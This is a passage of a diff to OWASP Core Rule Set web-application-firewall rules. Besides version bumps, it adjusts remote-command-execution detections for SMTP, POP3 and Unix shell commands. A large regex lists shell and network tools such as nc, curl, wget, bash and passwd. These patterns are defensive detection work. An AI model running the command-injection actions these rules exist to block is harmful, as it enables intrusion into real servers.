setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -494,7 +493,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS|XML: tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.932240_matched_var_name=%{matched_var_name}',\ chain" @@ -517,7 +516,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -525,6 +524,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME "id:932300,\ phase:2,\ block,\ + capture,\ t:none,t:escapeSeqDecode,\ msg:'Remote Command Execution: SMTP Command Execution',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ @@ -535,7 +535,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/137/134',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" @@ -553,11 +553,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/137/134',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\r\n.*?\b(?:(?:LIST|TOP [0-9]+)(?: [0-9]+)?|U(?:SER .+?|IDL(?: [0-9]+)?)|PASS .+?|(?:RETR|DELE) [0-9]+?|A(?:POP [0-9A-Z_a-z]+ [0-9a-f]{32}|UTH [\-0-9A-Z_]{1,20} (?:(?:[\+/-9A-Z_a-z]{4})*(?:[\+/-9A-Z_a-z]{2}=|[\+/-9A-Z_a-z]{3}))?=))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?is)\r\n.*?\b(?:(?:LIST|TOP [0-9]+)(?: [0-9]+)?|U(?:SER .+?|IDL(?: [0-9]+)?)|PASS .+?|(?:RETR|DELE) [0-9]+?|A(?:POP [0-9A-Z_a-z]+ [0-9a-f]{32}|UTH [\-0-9_a-z]{1,20} (?:(?:[\+/-9A-Z_a-z]{4})*(?:[\+/-9A-Z_a-z]{2}=|[\+/-9A-Z_a-z]{3}))?=))" \ "id:932320,\ phase:2,\ block,\ @@ -571,11 +571,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/137/134',\ tag:'PCI/6.5.2',\ - ver:'OWASP_CRS/4.4.0',\ + ver:'OWASP_CRS/4.5.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\x0b&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine)|xel)[\s\x0b&\)<>\|]|pt(?:[\s\x0b&\)<>\|]|-get)|r(?:[\s\x0b&\)<>j\|]|(?:p|ch)[\s\x0b&\)<>\|]|ia2c)|s(?:h[\s\x0b&\)<>\|]|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible|tobm)|b(?:z(?:z[\s\x0b&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\)<>\|]|c))|h[\s\x0b&\)<>\|])|tch[\s\x0b&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\x0b&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[89]9|(?:a(?:t|ncel|psh)|c)[\s\x0b&\)<>\|]|mp|p(?:[\s\x0b&\)<>\|]|an|io|ulimit)|s(?:h|cli[\s\x0b&\)<>\|]|plit|vtool)|u(?:(?:t|rl)[\s\x0b&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\x0b&\)<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\)\-<>\|])|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\x0b&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\)<>\|]|w(?:say|think))|r(?:ash[\s\x0b&\)<>\|]|on(?:[\s\x0b&\)<>\|]|tab)))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\x0b&\)<>\|]|f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\x0b&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\x0b&\)<>\|]|n(?:v(?:[\s\x0b&\)<>\|]|-update)|d(?:if|sw))|qn|s(?:[\s\x0b&\)<>h\|]|ac)|x(?:(?:ec)?[\s\x0b&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\x0b&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\x0b&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\x0b&\)<>\|]|le(?:[\s\x0b&\)<>\|]|test))|mt|tp(?:[\s\x0b&\)<>\|]|stats|who)|acter|o(?:ld[\s\x0b&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\x0b]|ore)|db|e(?:(?:m|tfacl)[\s\x0b&\)<>\|]|ni(?:e[\s\x0b&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\x0b&\)<>\|]|nsh)|(?:o|awk)[\s\x0b&\)<>\|]|pg|r(?:c|ep[\s\x0b&\)<>\|]|oup(?:[\s\x0b&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\x0b&\)<>\|]|e(?:ad[\s\x0b&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\x0b&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\x0b&\)<>\|]|exec|o(?:(?:bs|in)[\s\x0b&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\x0b&\)<>\|]|all)|nife[\s\x0b&\)<>\|])|l(?:d(?:d?[\s\x0b&\)<>\|]|config)|(?:[np]|inks|ynx)[\s\x0b&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\x0b&\)<>\|]|(?:la)?tex)|z(?:[\s\x0b&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[ef]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\x0b&\)<>\|]|comm|log(?:in)?)|tex[\s\x0b&\)<>\|])|ess(?:[\s\x0b&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\x0b&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirror|request))|m(?:a(?:(?:n|ke)[\s\x0b&\)<>\|]|il(?:[\s\x0b&\)<>q\|]|x[\s\x0b&\)<>\|])|ster\.passwd|wk)|tr|(?:v|utt)[\s\x0b&\)<>\|]|k(?:dir[\s\x0b&\)<>\|]|fifo|nod|temp)|locate|o(?:squitto|unt[\s\x0b&\)<>\|])|sg(?:attrib|c(?:at|onv)|filter|merge|uniq)|ysql(?:admin|dump(?:slow)?|hotcopy|show)?)|n(?:c(?:[\s\x0b&\)<>\|]|\.(?:openbsd|traditional)|at)|e(?:t(?:[\s\x0b&\)<>\|]|(?:c|st)at|kit-ftp|plan)|ofetch)|(?:(?:ul)?l|ice)[\s\x0b&\)<>\|]|m(?:[\s\x0b&\)<>\|]|ap)|p(?:m[\s\x0b&\)<>\|]|ing)|a(?:no[\s\x0b&\)<>\|]|sm|wk)|o(?:de[\s\x0b&\)<>\|]|hup)|roff|s(?:enter|lookup|tat))|o(?:(?:d|ctave)[\s\x0b&\)<>\|]|nintr|p(?:en(?:ssl|v(?:pn|t))|kg))|p(?:a(?:(?:x|rted|tch)[\s\x0b&\)<>\|]|s(?:swd|te[\s\x0b&\)<>\|]))|d(?:b|f(?:la)?tex|ksh)|f(?:[\s\x0b&\)<>\|]|tp)|g(?:rep)?|hp(?:[\s\x0b&\)57<>\|]|-cgi)|i(?:(?:co?|ng)[\s\x0b&\)<>\|]|p[^\s\x0b]|dstat|gz)|k(?:g(?:_?info)?|exec|ill)|r(?:y?[\s\x0b&\)<>\|]|int(?:env|f[\s\x0b&\)<>\|]))|t(?:x|ar(?:diff|grep)?)|wd(?:\.db)?|xz|er(?:(?:f|ms)[\s\x0b&\)<>\|]|l(?:[\s\x0b&\)5<>\|]|sh))|opd|s(?:ed|ftp|ql)|u(?:ppet[\s\x0b&\)<>\|]|shd)|y(?:thon[^\s\x0b]|3?versions))|r(?:a(?:r[\s\x0b&\)<>\|]|k(?:e[\s\x0b&\)<>\|]|u))|c(?:p[\s\x0b&\)<>\|])?|e(?:(?:d(?:carpet)?|v|name|p(?:eat|lace))[\s\x0b&\)<>\|]|a(?:delf|lpath)|stic)|m(?:(?:dir)?[\s\x0b&\)<>\|]|user)|pm(?:[\s\x0b&\)<>\|]|db|(?:quer|verif)y)|bash|l(?:ogin|wrap)|nano|oute[\s\x0b&\)<>\|]|sync|u(?:by[^\s\x0b]|n-(?:mailcap|parts))|vi(?:ew|m))|s(?:c(?:p|(?:hed|r(?:een|ipt))[\s\x0b&\)<>\|])|e(?:(?:d|lf|rvice)[\s\x0b&\)<>\|]|t(?:(?:facl)?[\s\x0b&\)<>\|]|arch|env|sid)|ndmail)|(?:g|ash|nap)[\s\x0b&\)<>\|]|h(?:(?:adow|ells)?[\s\x0b&\)<>\|]|\.distrib|u(?:f|tdown[\s\x0b&\)<>\|]))|s(?:[\s\x0b&\)<>\|]|h(?:[\s\x0b&\)<>\|]|-key(?:ge|sca)n|pass))|u(?:[\s\x0b&\)<>\|]|do)|vn|diff|ftp|l(?:eep[\s\x0b&\)<>\|]|sh)|mbclient|o(?:cat|elim|(?:rt|urce)[\s\x0b&\)<>\|])|p(?:lit[\s\x0b&\)<>\|]|wd\.db)|qlite3|t(?:art-stop-daemon|d(?:buf|err|in|out)|r(?:ace|ings[\s\x0b&\)<>\|]))|ys(?:ctl|tem(?:ctl|d-resolve)))|t(?:a(?:c|r[\s\x0b&\)<>\|]|il[\s\x0b&\)<>f\|]|sk(?:[\s\x0b&\)<>\|]|set))|bl|c(?:p(?:[\s\x0b&\)<>\|]|dump|ing|traceroute)|l?sh)|e(?:[ex][\s\x0b&\)<>\|]|lnet)|i(?:c[\s\x0b&\)<>\|]|me(?:datectl|out[\s\x0b&\)<>\|]))|o(?:p|uch[\s\x0b&\)<>\|])|ftp|mux|r(?:aceroute6?|off)|shark)|u(?:dp|l(?:imit)?[\s\x0b&\)<>\|]|n(?:ame|(?:compress|s(?:et|hare))[\s\x0b&\)<>\|]|expand|iq|l(?:ink[\s\x0b&\)<>\|]|z(?:4|ma))|(?:pig|x)z|rar|z(?:ip[\s\x0b&\)<>\|]|std))|pdate-alternatives|ser(?:(?:ad|mo)d|del)|u(?:de|en)code)|v(?:i(?:m(?:[\s\x0b&\)<>\|]|diff)|ew[\s\x0b&\)<>\|]|gr|pw|rsh|sudo)|algrind|olatility[\s\x0b&\)<>\|])|w(?:3m|c|a(?:ll|tch)[\s\x0b&\)<>\|]|get|h(?:iptail[\s\x0b&\)<>\|]|o(?:ami|is))|i(?:reshark|sh[\s\x0b&\)<>\|]))|x(?:(?:x|pa)d|z(?:[\s\x0b&\)<>\|]|c(?:at|mp)|d(?:ec|iff)|[ef]?grep|less|more)|args|e(?:la)?tex|mo(?:dmap|re)|term)|y(?:(?:e(?:s|lp)|arn)[\s\x0b&\)<>\|]|um)|z(?:ip(?:[\s\x0b&\)<>\|]|c(?:loak|mp)|details|grep|info|(?:merg|not)e|split|tool)|s(?:h|oelim|td(?:(?:ca|m)t|grep|less)?)|athura|c(?:at|mp)|diff|e(?:grep|ro[\s\x0b&\)<>\|])|f?grep|less|more|run|ypper))" \ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:^|b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?s[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?y[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?b[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?x|c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?d|e[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?(?:n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?v|v[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?l)|[ls][\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?r[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e|n[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?p|t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?i[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?m[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?e(?:[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?o[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?u[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t)?|w[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?a[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?t[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?c[\"'\)\[\x5c]*(?:(?:(?:\|\||&&)[\s\x0b]*)?\$[!#\(\*\-0-9\?@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|[\[\{])|<(?:\(|<<)|>\(|\([\s\x0b]*\))[\s\x0b]*(?:[\$\{]|(?:[\s\x0b]*\(|!)[\s\x0b]*|[0-9A-Z_a-z]+=(?:[^\s\x0b]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\x0b]+)*[\s\x0b]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7z[arx]?|(?:(?:GE|POS)T|HEAD)[\s\x0b&\)<>\|]|a(?:(?:b|w[ks]|l(?:ias|pine)|xel)[\s\x0b&\)<>\|]|pt(?:[\s\x0b&\)<>\|]|-get)|r(?:[\s\x0b&\)<>j\|]|(?:p|ch)[\s\x0b&\)<>\|]|ia2c)|s(?:h[\s\x0b&\)<>\|]|cii(?:-xfr|85)|pell)|dd(?:group|user)|getty|nsible|tobm)|b(?:z(?:z[\s\x0b&\)<>\|]|c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more)|a(?:s(?:e(?:32|64|n(?:ame[\s\x0b&\)<>\|]|c))|h[\s\x0b&\)<>\|])|tch[\s\x0b&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\x0b&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\x0b&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu))|c(?:[89]9|(?:a(?:t|ncel|psh)|c)[\s\x0b&\)<>\|]|mp|p(?:[\s\x0b&\)<>\|]|an|io|ulimit)|s(?:h|cli[\s\x0b&\)<>\|]|plit|vtool)|u(?:(?:t|rl)[\s\x0b&\)<>\|]|psfilter)|ertbot|h(?:attr|(?:dir|root)[\s\x0b&\)<>\|]|e(?:ck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|f[\s\x0b&\)\-<>\|])|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\x0b&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\x0b&\)<>\|]|w(?:say|think))|r(?:ash[\s\x0b&\)<>\|]|on(?:[\s\x0b&\)<>\|]|tab)))|d(?:(?:[du]|i(?:(?:alo)?g|r|ff)|a(?:sh|te))[\s\x0b&\)<>\|]|f|hclient|m(?:esg|idecode|setup)|o(?:as|(?:cker|ne)[\s\x0b&\)<>\|]|sbox)|pkg|vips)|e(?:(?:[bd]|cho)[\s\x0b&\)<>\|]|n(?:v(?:[\s\x0b&\)<>\|]|-update)|d(?:if|sw))|qn|s(?:[\s\x0b&\)<>h\|]|ac)|x(?:(?:ec)?[\s\x0b&\)<>\|]|iftool|p(?:(?:and|(?:ec|or)t)[\s\x0b&\)<>\|]|r))|2fsck|(?:asy_instal|va)l|fax|grep|macs)|f(?:(?:c|etch|lock|unction)[\s\x0b&\)<>\|]|d|g(?:rep)?|i(?:(?:n(?:d|ger)|sh)?[\s\x0b&\)<>\|]|le(?:[\s\x0b&\)<>\|]|test))|mt|tp(?:[\s\x0b&\)<>\|]|stats|who)|acter|o(?:ld[\s\x0b&\)<>\|]|reach)|ping)|g(?:c(?:c[^\s\x0b]|ore)|db|e(?:(?:m|tfacl)[\s\x0b&\)<>\|]|ni(?:e[\s\x0b&\)<>\|]|soimage))|hci?|i(?:(?:t|mp)[\s\x0b&\)<>\|]|nsh)|(?:o|awk)[\s\x0b&\)<>\|]|pg|r(?:c|ep[\s\x0b&\)<>\|]|oup(?:[\s\x0b&\)<>\|]|mod))|tester|unzip|z(?:cat|exe|ip))|h(?:(?:d|up|ash|i(?:ghlight|story))[\s\x0b&\)<>\|]|e(?:ad[\s\x0b&\)<>\|]|xdump)|ost(?:id|name)|ping3|t(?:digest|op|passwd))|i(?:d|p(?:6?tables|config)?|rb|conv|f(?:config|top)|nstall[\s\x0b&\)<>\|]|onice|spell)|j(?:js|q|ava[\s\x0b&\)<>\|]|exec|o(?:(?:bs|in)[\s\x0b&\)<>\|]|urnalctl)|runscript)|k(?:s(?:h|shell)|ill(?:[\s\x0b&\)<>\|]|all)|nife[\s\x0b&\)<>\|])|l(?:d(?:d?[\s\x0b&\)<>\|]|config)|(?:[np]|inks|ynx)[\s\x0b&\)<>\|]|s(?:-F|b_release|cpu|hw|mod|of|pci|usb)?|ua(?:[\s\x0b&\)<>\|]|(?:la)?tex)|z(?:[\s\x0b&\)4<>\|]|4c(?:at)?|c(?:at|mp)|diff|[ef]?grep|less|m(?:a(?:dec|info)?|ore))|a(?:st(?:[\s\x0b&\)<>\|]|comm|log(?:in)?)|tex[\s\x0b&\)<>\|])|ess(?:[\s\x0b&\)<>\|]|echo|(?:fil|pip)e)|ftp(?:get)?|o(?:(?:ca(?:l|te)|ok)[\s\x0b&\)<>\|]|g(?:inctl|(?:nam|sav)e)|setup)|trace|wp-(?:d(?:ownload|ump)|mirr